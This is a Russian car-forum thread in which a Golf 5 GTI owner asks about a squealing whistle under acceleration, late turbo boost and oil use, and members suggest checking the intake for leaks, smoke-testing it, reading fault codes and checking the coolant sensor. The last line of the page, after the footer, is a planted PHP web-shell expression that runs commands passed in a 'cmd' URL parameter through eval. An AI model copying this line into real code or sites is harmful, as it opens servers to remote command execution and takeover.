+ Ответить в теме
Показано с 1 по 6 из 6

Тема: Скрипящй свист в двигателе!


  1. #1
    Мимо проходил ST4FF1 is on a distinguished road Аватар для ST4FF1
    Регистрация
    18.01.2016
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    16

    Question Скрипящй свист в двигателе!

    Всем привет!

    1) Помогите! Кто сталкивался или знает что за проблема? Имеем GTI 5 APR stage 1 из под капота, при наборе скорости начиная от 3 тыс оборотов, появляется какой то скрипящий свист, после 4 тыс он пропадает, по крайней мере так было раньше, щас хуже, почти постоянно он.
    На холостых, он то есть, то его нет. Он появляется только когда педаль нажимать, когда идет большая нагрузка и машина начинает разгоняться.

    2) Еще непонятно одно, раньше турбина срабатывала на 4 тыс оборотах, сейчас же начинает срабатывать от 5,5 тыс, иногда даже вообще нет рывка, набирает скорость как будто атмосферник
    После последней замены масла проехал 1400 км, долил уже 1л, масло MOTUL 8100 x-cess 5w40

    Погонял машину на 400 метров со шкодой 1.8 турбо, в стоке у нее 150 сил, сделали чип Revo на 200 сил, так вот по идее, у меня в стоке идет 200, так плюс чип стоит и на 98 бензине, в итоге, даже догнать не могу и после 400 метров так же не едет.

    В сервисе думают на "кастрюлю" на крышку двигателя , где воздушный фильтр, что где то трещина и она воздух подсасывает.

    Кто что думает, есть идеи?

  2. #2
    Мимо проходил Kucher9tor is on a distinguished road Аватар для Kucher9tor
    Регистрация
    19.04.2016
    Откуда
    Зеленоград
    Машина
    GOLF 5 GTI
    Сообщений
    48
    Так турбина должна с 2тыщ крутить вроде, или даже с 1800, может именно она и подыхает? у меня у самого тоже машина странно ведет себя, турбина начинает хорошо работать только после 10 минут езды примерно. а у тебя как-то совсем плохо.
    Надо на месте газ чтоб кто-то понажимал, попытаться услышать откуда свист, если свист из впуска, то будет понятно откуда он, мне кажется, а если со стороны турбины, то ей привет)
    (это я так, диванный специалист, сам купил гольф месяц назад)))

  3. #3
    Мимо проходил ST4FF1 is on a distinguished road Аватар для ST4FF1
    Регистрация
    18.01.2016
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    16
    Да в том то и дело, что на холостых слушали и непонятно откуда, и то на холостых не всегда, на холодную машину нет свиста, когда разогреется, тогда начинает появляться.
    Если я конечно не ошибаюсь, но вроде, как есть разные турбины, которые схватывают с низов и которые начинают с верхов нагнетать.
    А по твоей машине скажу, что вроде это нормально, потому что дай машине прогреться немного, я сам даю ей минут 5-7 на холостых прогреться, тогда нормально едет, а если сразу ехать, то она да не будет ехать , пока не прогреется. У нее в эксплуатации даже написано, что не надо ей прогреваться, завел и сразу поехал, что пока едешь она и будет прогреваться, что нужно просто не давать высоких оборотов, пока не прогреется, тогда можно сразу ехать, но опять же, я не думаю, что инструкцию писали специально для России, для наших климатических условий и холодов) Спасибо тебе , что поделился мыслями)

  4. #4
    Мимо проходил Ведровер is on a distinguished road Аватар для Ведровер
    Регистрация
    18.06.2014
    Откуда
    Замкадье
    Машина
    GTI mk6 stage3
    Сообщений
    16
    Проверь впуск, пусть сделают опрессовку, может где какой патрубок перетерся, байпас проверь, какие есть ошибки, снять логи, сколько вобще турбина дует

  5. #5
    Мимо проходил ST4FF1 is on a distinguished road Аватар для ST4FF1
    Регистрация
    18.01.2016
    Откуда
    Москва
    Машина
    GTI 5
    Сообщений
    16
    Спасибо, буду это все дело после праздников проверять. Вот тут еще одна мыслишка закралась, вентилятор постоянно включается, бывает даже на холодную завести, так сразу вентилятор начинает работать, может быть с системой охлаждения что, интеркулер например?

  6. #6
    Мимо проходил Ведровер is on a distinguished road Аватар для Ведровер
    Регистрация
    18.06.2014
    Откуда
    Замкадье
    Машина
    GTI mk6 stage3
    Сообщений
    16
    Если на холодную вентилятор работает, то может датчик ОЖ неисправен. Считай ошибки васей хотябы, может сразу многое прояснится.

+ Ответить в теме

Похожие темы

  1. Постукивание в двигателе
    от severs в разделе Golf 5
    Ответов: 180
    Последнее сообщение: 02.01.2024, 00:44
  2. стук пальцев в двигателе
    от Кержик в разделе Двигатель
    Ответов: 3
    Последнее сообщение: 23.01.2010, 20:54
  3. Замер компрессии на бензиновом двигателе
    от RusTrojan в разделе Двигатель
    Ответов: 2
    Последнее сообщение: 22.01.2010, 20:10
  4. Давление Масла В Двигателе
    от Николай в разделе Двигатель
    Ответов: 3
    Последнее сообщение: 29.01.2009, 23:23
  5. Свист, писк на прогретом двигателе
    от Palma в разделе Ремонт и обслуживание
    Ответов: 2
    Последнее сообщение: 23.03.2008, 13:13

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}